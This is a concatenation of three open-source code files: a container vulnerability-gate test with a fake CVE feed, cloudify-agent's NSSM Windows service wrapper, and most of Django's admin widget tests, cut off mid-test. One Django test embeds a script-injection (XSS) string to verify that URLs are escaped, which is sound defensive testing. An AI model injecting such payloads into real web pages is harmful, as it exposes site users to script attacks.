"Version": "3.1.1-2+deb8u3",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST2",
"Name": "CVE-TEST-TEST2",
"Severity": "High"
}
},
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "3.1.3-2+deb8u3",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST3",
"Name": "CVE-TEST-TEST3",
"Severity": "Critical"
}
}
]
The debian:8 feed vuln data is purely fake and for testing against this package specifically
"""
gate_clazz = VulnerabilitiesGate
__default_image__ = "node"
def test_unsupported_distro(self):
t, gate, test_context = self.get_initialized_trigger(
UnsupportedDistroTrigger.__trigger_name__
)
db = get_thread_scoped_session()
image = db.query(Image).get(
(self.test_env.get_images_named("busybox")[0][0], "0")
)
test_context = gate.prepare_context(image, test_context)
t.evaluate(image, test_context)
logger.info(("Fired: {}".format(t.fired)))
self.assertEqual(len(t.fired), 1)
def test_feedoutofdate(self):
t, gate, test_context = self.get_initialized_trigger(
FeedOutOfDateTrigger.__trigger_name__, max_days_since_sync="0"
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info(("Fired: {}".format(t.fired)))
self.assertEqual(len(t.fired), 1)
t, gate, test_context = self.get_initialized_trigger(
FeedOutOfDateTrigger.__trigger_name__, max_days_since_sync="1000000"
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info(("Fired: {}".format(t.fired)))
self.assertEqual(len(t.fired), 0)
def test_all_severity(self):
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
package_type="all",
severity="unknown",
severity_comparison=">=",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
self.assertGreaterEqual(len(t.fired), 1)
def test_packages_severity(self):
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
package_type="all",
severity="medium",
severity_comparison=">=",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
# CVE-TEST-TEST3, all others are either already fixed or < medium
self.assertGreaterEqual(len(t.fired), 1)
def test_fixavailableparam(self):
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
package_type="all",
severity="medium",
severity_comparison=">=",
fix_available="True",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
# CVE-TEST-TEST3
self.assertGreaterEqual(len(t.fired), 1)
t, gate, test_context = self.get_initialized_trigger(
VulnerabilityMatchTrigger.__trigger_name__,
fix_available="False",
severity="unknown",
severity_comparison=">=",
package_type="all",
)
test_context = gate.prepare_context(self.test_image, test_context)
t.evaluate(self.test_image, test_context)
logger.info("Fired: {}".format(t.fired))
# CVE-TEST-TEST0
self.assertGreaterEqual(len(t.fired), 1)
| apache-2.0 |
codilime/cloudify-agent | cloudify_agent/api/pm/nssm.py | 1 | 7393 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
from cloudify.exceptions import CommandExecutionException
from cloudify_agent import VIRTUALENV
from cloudify_agent.api import defaults
from cloudify_agent.api import exceptions
from cloudify_agent.api import utils
from cloudify_agent.api.pm.base import Daemon
class NonSuckingServiceManagerDaemon(Daemon):
"""
Implementation for the nssm windows service management.
Based on the nssm service management. see https://nssm.cc/
Following are all possible custom key-word arguments
(in addition to the ones available in the base daemon)
``startup_policy``
Specifies the start type for the service.
possible values are:
boot - A device driver that is loaded by the boot loader.
system - A device driver that is started during kernel
initialization
auto - A service that automatically starts each time the
computer is restarted and runs even if no one logs on to
the computer.
demand - A service that must be manually started. This is the
default value if start= is not specified.
disabled - A service that cannot be started. To start a disabled
service, change the start type to some other value.
``failure_reset_timeout``
Specifies the length of the period (in seconds) with no failures
after which the failure count should be reset to 0.
``failure_restart_delay``
Specifies delay time (in milliseconds) for the restart action.
"""
PROCESS_MANAGEMENT = 'nssm'
RUNNING_STATES = ['SERVICE_RUNNING', 'SERVICE_STOP_PENDING']
def __init__(self, logger=None, **params):
super(NonSuckingServiceManagerDaemon, self).__init__(
logger=logger, **params)
self.config_path = os.path.join(
self.workdir,
'{0}.conf.bat'.format(self.name))
self.nssm_path = utils.get_absolute_resource_path(
os.path.join('pm', 'nssm', 'nssm.exe'))
self.startup_policy = params.get('startup_policy', 'auto')
self.failure_reset_timeout = params.get('failure_reset_timeout', 60)
self.failure_restart_delay = params.get('failure_restart_delay', 5000)
def create_script(self):
pass
def create_config(self):
env_string = self._create_env_string()
# creating the installation script
self._logger.debug('Rendering configuration script "{0}" from template'
.format(self.config_path))
utils.render_template_to_file(
template_path='pm/nssm/nssm.conf.template',
file_path=self.config_path,
queue=self.queue,
nssm_path=self.nssm_path,
log_level=self.log_level,
log_file=self.get_logfile(),
workdir=self.workdir,
user=self.user,
rest_host=self.rest_host,
rest_port=self.rest_port,
rest_protocol=self.rest_protocol,
file_server_host=self.file_server_host,
file_server_port=self.file_server_port,
file_server_protocol=self.file_server_protocol,
security_enabled=self.security_enabled,
verify_rest_certificate=self.verify_rest_certificate,
local_rest_cert_file=self.local_rest_cert_file,
rest_cert_content=self.rest_cert_content,
broker_url=self.broker_url,
min_workers=self.min_workers,
max_workers=self.max_workers,
virtualenv_path=VIRTUALENV,
name=self.name,
storage_dir=utils.internal.get_storage_directory(self.user),
custom_environment=env_string,
startup_policy=self.startup_policy,
failure_reset_timeout=self.failure_reset_timeout,
failure_restart_delay=self.failure_restart_delay
)
self._logger.debug('Rendered configuration script: {0}'.format(
self.config_path))
# run the configuration script
self._logger.info('Running configuration script')
self._runner.run(self.config_path)
self._logger.debug('Successfully executed configuration script')
def before_self_stop(self):
if self.startup_policy in ['boot', 'system', 'auto']:
self._logger.debug('Disabling service: {0}'.format(self.name))
self._runner.run('sc config {0} start= disabled'.format(self.name))
def delete(self, force=defaults.DAEMON_FORCE_DELETE):
if self._is_agent_registered():
if not force:
raise exceptions.DaemonStillRunningException(self.name)
self.stop()
self._logger.info('Removing {0} service'.format(
self.name))
self._runner.run('{0} remove {1} confirm'.format(
self.nssm_path,
self.name))
self._logger.debug('Deleting {0}'.format(self.config_path))
if os.path.exists(self.config_path):
os.remove(self.config_path)
def start_command(self):
if not os.path.isfile(self.config_path):
raise exceptions.DaemonNotConfiguredError(self.name)
return 'sc start {0}'.format(self.name)
def stop_command(self):
return 'sc stop {0}'.format(self.name)
def status(self):
try:
command = '{0} status {1}'.format(self.nssm_path, self.name)
response = self._runner.run(command)
# apparently nssm output is encoded in utf16.
# encode to ascii to be able to parse this
state = response.std_out.decode('utf16').encode(
'utf-8').rstrip()
self._logger.info(state)
if state in self.RUNNING_STATES:
return True
else:
return False
except CommandExecutionException as e:
self._logger.debug(str(e))
return False
def get_worker_id_placeholder(self):
"""
Returns placeholder suitable for windows systems.
Due to bug in Celery placeholder %I is not working
properly on nt systems.
"""
return '{0}'
def _create_env_string(self):
env_string = ''
if self.extra_env_path and os.path.exists(self.extra_env_path):
with open(self.extra_env_path) as f:
content = f.read()
for line in content.splitlines():
if line.startswith('set'):
parts = line.split(' ')[1].split('=')
key = parts[0]
value = parts[1]
env_string = '{0} {1}={2}'.format(env_string, key, value)
return env_string.rstrip()
| apache-2.0 |
ghickman/django | tests/admin_widgets/tests.py | 2 | 58590 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gettext
import os
from datetime import datetime, timedelta
from importlib import import_module
from unittest import skipIf
from django import forms
from django.conf import settings
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.admin.tests import AdminSeleniumWebDriverTestCase
from django.contrib.auth.models import User
from django.core.files.storage import default_storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.db.models import CharField, DateField
from django.test import SimpleTestCase, TestCase, override_settings
from django.utils import six, translation
from . import models
from .widgetadmin import site as widget_admin_site
try:
import pytz
except ImportError:
pytz = None
class TestDataMixin(object):
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='[email protected]',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime(2007, 5, 30, 13, 20, 10)
)
cls.u2 = User.objects.create(
pk=101, username='testser', first_name='Add', last_name='User', email='[email protected]',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=False,
is_staff=True, last_login=datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime(2007, 5, 30, 13, 20, 10)
)
models.Car.objects.create(id=1, owner=cls.u1, make='Volkswagen', model='Passat')
models.Car.objects.create(id=2, owner=cls.u2, make='BMW', model='M3')
class SeleniumDataMixin(object):
def setUp(self):
self.u1 = User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='[email protected]',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime(2007, 5, 30, 13, 20, 10)
)
class AdminFormfieldForDBFieldTests(SimpleTestCase):
"""
Tests for correct behavior of ModelAdmin.formfield_for_dbfield
"""
def assertFormfield(self, model, fieldname, widgetclass, **admin_overrides):
"""
Helper to call formfield_for_dbfield for a given model and field name
and verify that the returned formfield is appropriate.
"""
# Override any settings on the model admin
class MyModelAdmin(admin.ModelAdmin):
pass
for k in admin_overrides:
setattr(MyModelAdmin, k, admin_overrides[k])
# Construct the admin, and ask it for a formfield
ma = MyModelAdmin(model, admin.site)
ff = ma.formfield_for_dbfield(model._meta.get_field(fieldname), request=None)
# "unwrap" the widget wrapper, if needed
if isinstance(ff.widget, widgets.RelatedFieldWidgetWrapper):
widget = ff.widget.widget
else:
widget = ff.widget
# Check that we got a field of the right type
self.assertTrue(
isinstance(widget, widgetclass),
"Wrong widget for %s.%s: expected %s, got %s" % (
model.__class__.__name__,
fieldname,
widgetclass,
type(widget),
)
)
# Return the formfield so that other tests can continue
return ff
def test_DateField(self):
self.assertFormfield(models.Event, 'start_date', widgets.AdminDateWidget)
def test_DateTimeField(self):
self.assertFormfield(models.Member, 'birthdate', widgets.AdminSplitDateTime)
def test_TimeField(self):
self.assertFormfield(models.Event, 'start_time', widgets.AdminTimeWidget)
def test_TextField(self):
self.assertFormfield(models.Event, 'description', widgets.AdminTextareaWidget)
def test_URLField(self):
self.assertFormfield(models.Event, 'link', widgets.AdminURLFieldWidget)
def test_IntegerField(self):
self.assertFormfield(models.Event, 'min_age', widgets.AdminIntegerFieldWidget)
def test_CharField(self):
self.assertFormfield(models.Member, 'name', widgets.AdminTextInputWidget)
def test_EmailField(self):
self.assertFormfield(models.Member, 'email', widgets.AdminEmailInputWidget)
def test_FileField(self):
self.assertFormfield(models.Album, 'cover_art', widgets.AdminFileWidget)
def test_ForeignKey(self):
self.assertFormfield(models.Event, 'main_band', forms.Select)
def test_raw_id_ForeignKey(self):
self.assertFormfield(models.Event, 'main_band', widgets.ForeignKeyRawIdWidget,
raw_id_fields=['main_band'])
def test_radio_fields_ForeignKey(self):
ff = self.assertFormfield(models.Event, 'main_band', widgets.AdminRadioSelect,
radio_fields={'main_band': admin.VERTICAL})
self.assertEqual(ff.empty_label, None)
def test_many_to_many(self):
self.assertFormfield(models.Band, 'members', forms.SelectMultiple)
def test_raw_id_many_to_many(self):
self.assertFormfield(models.Band, 'members', widgets.ManyToManyRawIdWidget,
raw_id_fields=['members'])
def test_filtered_many_to_many(self):
self.assertFormfield(models.Band, 'members', widgets.FilteredSelectMultiple,
filter_vertical=['members'])
def test_formfield_overrides(self):
self.assertFormfield(models.Event, 'start_date', forms.TextInput,
formfield_overrides={DateField: {'widget': forms.TextInput}})
def test_formfield_overrides_widget_instances(self):
"""
Test that widget instances in formfield_overrides are not shared between
different fields. (#19423)
"""
class BandAdmin(admin.ModelAdmin):
formfield_overrides = {
CharField: {'widget': forms.TextInput(attrs={'size': '10'})}
}
ma = BandAdmin(models.Band, admin.site)
f1 = ma.formfield_for_dbfield(models.Band._meta.get_field('name'), request=None)
f2 = ma.formfield_for_dbfield(models.Band._meta.get_field('style'), request=None)
self.assertNotEqual(f1.widget, f2.widget)
self.assertEqual(f1.widget.attrs['maxlength'], '100')
self.assertEqual(f2.widget.attrs['maxlength'], '20')
self.assertEqual(f2.widget.attrs['size'], '10')
def test_field_with_choices(self):
self.assertFormfield(models.Member, 'gender', forms.Select)
def test_choices_with_radio_fields(self):
self.assertFormfield(models.Member, 'gender', widgets.AdminRadioSelect,
radio_fields={'gender': admin.VERTICAL})
def test_inheritance(self):
self.assertFormfield(models.Album, 'backside_art', widgets.AdminFileWidget)
def test_m2m_widgets(self):
"""m2m fields help text as it applies to admin app (#9321)."""
class AdvisorAdmin(admin.ModelAdmin):
filter_vertical = ['companies']
self.assertFormfield(models.Advisor, 'companies', widgets.FilteredSelectMultiple,
filter_vertical=['companies'])
ma = AdvisorAdmin(models.Advisor, admin.site)
f = ma.formfield_for_dbfield(models.Advisor._meta.get_field('companies'), request=None)
self.assertEqual(
six.text_type(f.help_text),
'Hold down "Control", or "Command" on a Mac, to select more than one.'
)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminFormfieldForDBFieldWithRequestTests(TestDataMixin, TestCase):
def test_filter_choices_by_request_user(self):
"""
Ensure the user can only see their own cars in the foreign key dropdown.
"""
self.client.login(username="super", password="secret")
response = self.client.get(reverse('admin:admin_widgets_cartire_add'))
self.assertNotContains(response, "BMW M3")
self.assertContains(response, "Volkswagen Passat")
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyWidgetChangeList(TestDataMixin, TestCase):
def setUp(self):
self.client.login(username="super", password="secret")
def test_changelist_ForeignKey(self):
response = self.client.get(reverse('admin:admin_widgets_car_changelist'))
self.assertContains(response, '/auth/user/add/')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyRawIdWidget(TestDataMixin, TestCase):
def setUp(self):
self.client.login(username="super", password="secret")
def test_nonexistent_target_id(self):
band = models.Band.objects.create(name='Bogey Blues')
pk = band.pk
band.delete()
post_data = {
"main_band": '%s' % pk,
}
# Try posting with a non-existent pk in a raw id field: this
# should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'), post_data)
self.assertContains(response,
'Select a valid choice. That choice is not one of the available choices.')
def test_invalid_target_id(self):
for test_str in ('Iñtërnâtiônàlizætiøn', "1234'", -1234):
# This should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'),
{"main_band": test_str})
self.assertContains(response,
'Select a valid choice. That choice is not one of the available choices.')
def test_url_params_from_lookup_dict_any_iterable(self):
lookup1 = widgets.url_params_from_lookup_dict({'color__in': ('red', 'blue')})
lookup2 = widgets.url_params_from_lookup_dict({'color__in': ['red', 'blue']})
self.assertEqual(lookup1, {'color__in': 'red,blue'})
self.assertEqual(lookup1, lookup2)
def test_url_params_from_lookup_dict_callable(self):
def my_callable():
return 'works'
lookup1 = widgets.url_params_from_lookup_dict({'myfield': my_callable})
lookup2 = widgets.url_params_from_lookup_dict({'myfield': my_callable()})
self.assertEqual(lookup1, lookup2)
class FilteredSelectMultipleWidgetTest(SimpleTestCase):
def test_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', False)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple="multiple" name="test" class="selectfilter" '
'data-field-name="test\\" data-is-stacked="0">\n</select>'
)
def test_stacked_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', True)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple="multiple" name="test" class="selectfilterstacked" '
'data-field-name="test\\" data-is-stacked="1">\n</select>'
)
class AdminDateWidgetTest(SimpleTestCase):
def test_attrs(self):
"""
Ensure that user-supplied attrs are used.
Refs #12073.
"""
w = widgets.AdminDateWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="vDateField" name="test" size="10" />',
)
# pass attrs to widget
w = widgets.AdminDateWidget(attrs={'size': 20, 'class': 'myDateField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="myDateField" name="test" size="20" />',
)
class AdminTimeWidgetTest(SimpleTestCase):
def test_attrs(self):
"""
Ensure that user-supplied attrs are used.
Refs #12073.
"""
w = widgets.AdminTimeWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="vTimeField" name="test" size="8" />',
)
# pass attrs to widget
w = widgets.AdminTimeWidget(attrs={'size': 20, 'class': 'myTimeField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="myTimeField" name="test" size="20" />',
)
class AdminSplitDateTimeWidgetTest(SimpleTestCase):
def test_render(self):
w = widgets.AdminSplitDateTime()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Date: <input value="2007-12-01" type="text" class="vDateField" '
'name="test_0" size="10" /><br />'
'Time: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8" /></p>'
)
def test_localization(self):
w = widgets.AdminSplitDateTime()
with self.settings(USE_L10N=True), translation.override('de-at'):
w.is_localized = True
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Datum: <input value="01.12.2007" type="text" '
'class="vDateField" name="test_0"size="10" /><br />'
'Zeit: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8" /></p>'
)
class AdminURLWidgetTest(SimpleTestCase):
def test_render(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', ''),
'<input class="vURLField" name="test" type="url" />'
)
self.assertHTMLEqual(
w.render('test', 'http://example.com'),
'<p class="url">Currently:<a href="http://example.com">'
'http://example.com</a><br />'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example.com" /></p>'
)
def test_render_idn(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', 'http://example-äüö.com'),
'<p class="url">Currently: <a href="http://xn--example--7za4pnc.com">'
'http://example-äüö.com</a><br />'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example-äüö.com" /></p>'
)
def test_render_quoting(self):
# WARNING: Don't use assertHTMLEqual in that testcase!
# assertHTMLEqual will get rid of some escapes which are tested here!
w = widgets.AdminURLFieldWidget()
self.assertEqual(
w.render('test', 'http://example.com/<sometag>some text</sometag>'),
'<p class="url">Currently: '
'<a href="http://example.com/%3Csometag%3Esome%20text%3C/sometag%3E">'
'http://example.com/<sometag>some text</sometag></a><br />'
'Change: <input class="vURLField" name="test" type="url" '
'value="http://example.com/<sometag>some text</sometag>" /></p>'
)
self.assertEqual(
w.render('test', 'http://example-äüö.com/<sometag>some text</sometag>'),
'<p class="url">Currently: '
'<a href="http://xn--example--7za4pnc.com/%3Csometag%3Esome%20text%3C/sometag%3E">'
'http://example-äüö.com/<sometag>some text</sometag></a><br />'
'Change: <input class="vURLField" name="test" type="url" '
'value="http://example-äüö.com/<sometag>some text</sometag>" /></p>'
)
self.assertEqual(
w.render('test', 'http://www.example.com/%C3%A4"><script>alert("XSS!")</script>"'),
'<p class="url">Currently: '
'<a href="http://www.example.com/%C3%A4%22%3E%3Cscript%3Ealert(%22XSS!%22)%3C/script%3E%22">'
'http://www.example.com/%C3%A4"><script>'
'alert("XSS!")</script>"</a><br />'
'Change: <input class="vURLField" name="test" type="url" '
'value="http://www.example.com/%C3%A4"><script>'
'alert("XSS!")</script>"" /></p>'
)
@override_settings(
PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls',
)
class AdminFileWidgetTests(TestDataMixin, TestCase):
@classmethod
def setUpTestData(cls):
super(AdminFileWidgetTests, cls).setUpTestData()
band = models.Band.objects.create(name='Linkin Park')
cls.album = band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
def test_render(self):
w = widgets.AdminFileWidget()
self.assertHTMLEqual(
w.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
'hybrid_theory.jpg">albums\hybrid_theory.jpg</a> '
'<span class="clearable-file-input">'
'<input type="checkbox" name="test-clear" id="test-clear_id" /> '
'<label for="test-clear_id">Clear</label></span><br />'
'Change: <input type="file" name="test" /></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
self.assertHTMLEqual(
w.render('test', SimpleUploadedFile('test', b'content')),
'<input type="file" name="test" />',
)
def test_readonly_fields(self):
"""
File widgets should render as a link when they're marked "read only."
"""
self.client.login(username="super", password="secret")
response = self.client.get(reverse('admin:admin_widgets_album_change', args=(self.album.id,)))
self.assertContains(
response,
'<p><a href="%(STORAGE_URL)salbums/hybrid_theory.jpg">'
'albums\hybrid_theory.jpg</a></p>' % {'STORAGE_URL': default_storage.url('')},
html=True,
)
self.assertNotContains(
response,
'<input type="file" name="cover_art" id="id_cover_art" />',
html=True,
)
response = self.client.get(reverse('admin:admin_widgets_album_add'))
self.assertContains(
response,
'<p></p>',
html=True,
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ForeignKeyRawIdWidgetTest(TestCase):
def test_render(self):
band = models.Band.objects.create(name='Linkin Park')
band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
rel = models.Album._meta.get_field('band').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', band.pk, attrs={}),
'<input type="text" name="test" value="%(bandpk)s" '
'class="vForeignKeyRawIdAdminField" />'
'<a href="/admin_widgets/band/?_to_field=id" class="related-lookup" '
'id="lookup_id_test" title="Lookup"></a> <strong>Linkin Park</strong>'
% {'bandpk': band.pk}
)
def test_relations_to_non_primary_key(self):
# Check that ForeignKeyRawIdWidget works with fields which aren't
# related to the model's primary key.
apple = models.Inventory.objects.create(barcode=86, name='Apple')
models.Inventory.objects.create(barcode=22, name='Pear')
core = models.Inventory.objects.create(
barcode=87, name='Core', parent=apple
)
rel = models.Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', core.parent_id, attrs={}),
'<input type="text" name="test" value="86" '
'class="vForeignKeyRawIdAdminField" />'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong>Apple</strong>'
)
def test_fk_related_model_not_in_admin(self):
# FK to a model not registered with admin site. Raw ID widget should
# have no magnifying glass link. See #16542
big_honeycomb = models.Honeycomb.objects.create(location='Old tree')
big_honeycomb.bee_set.create()
rel = models.Bee._meta.get_field('honeycomb').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('honeycomb_widget', big_honeycomb.pk, attrs={}),
'<input type="text" name="honeycomb_widget" value="%(hcombpk)s" />'
' <strong>Honeycomb object</strong>'
% {'hcombpk': big_honeycomb.pk}
)
def test_fk_to_self_model_not_in_admin(self):
# FK to self, not registered with admin site. Raw ID widget should have
# no magnifying glass link. See #16542
subject1 = models.Individual.objects.create(name='Subject #1')
models.Individual.objects.create(name='Child', parent=subject1)
rel = models.Individual._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('individual_widget', subject1.pk, attrs={}),
'<input type="text" name="individual_widget" value="%(subj1pk)s" />'
' <strong>Individual object</strong>'
% {'subj1pk': subject1.pk}
)
def test_proper_manager_for_label_lookup(self):
# see #9258
rel = models.Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
hidden = models.Inventory.objects.create(
barcode=93, name='Hidden', hidden=True
)
child_of_hidden = models.Inventory.objects.create(
barcode=94, name='Child of hidden', parent=hidden
)
self.assertHTMLEqual(
w.render('test', child_of_hidden.parent_id, attrs={}),
'<input type="text" name="test" value="93" class="vForeignKeyRawIdAdminField" />'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong>Hidden</strong>'
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ManyToManyRawIdWidgetTest(TestCase):
def test_render(self):
band = models.Band.objects.create(name='Linkin Park')
m1 = models.Member.objects.create(name='Chester')
m2 = models.Member.objects.create(name='Mike')
band.members.add(m1, m2)
rel = models.Band._meta.get_field('members').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', [m1.pk, m2.pk], attrs={}), (
'<input type="text" name="test" value="%(m1pk)s,%(m2pk)s" class="vManyToManyRawIdAdminField" />'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % dict(m1pk=m1.pk, m2pk=m2.pk)
)
self.assertHTMLEqual(
w.render('test', [m1.pk]), (
'<input type="text" name="test" value="%(m1pk)s" class="vManyToManyRawIdAdminField">'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % dict(m1pk=m1.pk)
)
def test_m2m_related_model_not_in_admin(self):
# M2M relationship with model not registered with admin site. Raw ID
# widget should have no magnifying glass link. See #16542
consultor1 = models.Advisor.objects.create(name='Rockstar Techie')
c1 = models.Company.objects.create(name='Doodle')
c2 = models.Company.objects.create(name='Pear')
consultor1.companies.add(c1, c2)
rel = models.Advisor._meta.get_field('companies').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('company_widget1', [c1.pk, c2.pk], attrs={}),
'<input type="text" name="company_widget1" value="%(c1pk)s,%(c2pk)s" />' % {'c1pk': c1.pk, 'c2pk': c2.pk}
)
self.assertHTMLEqual(
w.render('company_widget2', [c1.pk]),
'<input type="text" name="company_widget2" value="%(c1pk)s" />' % {'c1pk': c1.pk}
)
class RelatedFieldWidgetWrapperTests(SimpleTestCase):
def test_no_can_add_related(self):
rel = models.Individual._meta.get_field('parent').remote_field
w = widgets.AdminRadioSelect()
# Used to fail with a name error.
w = widgets.RelatedFieldWidgetWrapper(w, rel, widget_admin_site)
self.assertFalse(w.can_add_related)
def test_select_multiple_widget_cant_change_delete_related(self):
rel = models.Individual._meta.get_field('parent').remote_field
widget = forms.SelectMultiple()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertFalse(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
def test_on_delete_cascade_rel_cant_delete_related(self):
rel = models.Individual._meta.get_field('soulmate').remote_field
widget = forms.Select()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertTrue(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class DateTimePickerSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def test_show_hide_date_time_picker_widgets(self):
"""
Ensure that pressing the ESC key closes the date and time picker
widgets.
Refs #17064.
"""
from selenium.webdriver.common.keys import Keys
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# First, with the date picker widget ---------------------------------
# Check that the date picker is hidden
self.assertEqual(
self.get_css_value('#calendarbox0', 'display'), 'none')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# Check that the date picker is visible
self.assertEqual(
self.get_css_value('#calendarbox0', 'display'), 'block')
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# Check that the date picker is hidden again
self.assertEqual(
self.get_css_value('#calendarbox0', 'display'), 'none')
# Then, with the time picker widget ----------------------------------
# Check that the time picker is hidden
self.assertEqual(
self.get_css_value('#clockbox0', 'display'), 'none')
# Click the time icon
self.selenium.find_element_by_id('clocklink0').click()
# Check that the time picker is visible
self.assertEqual(
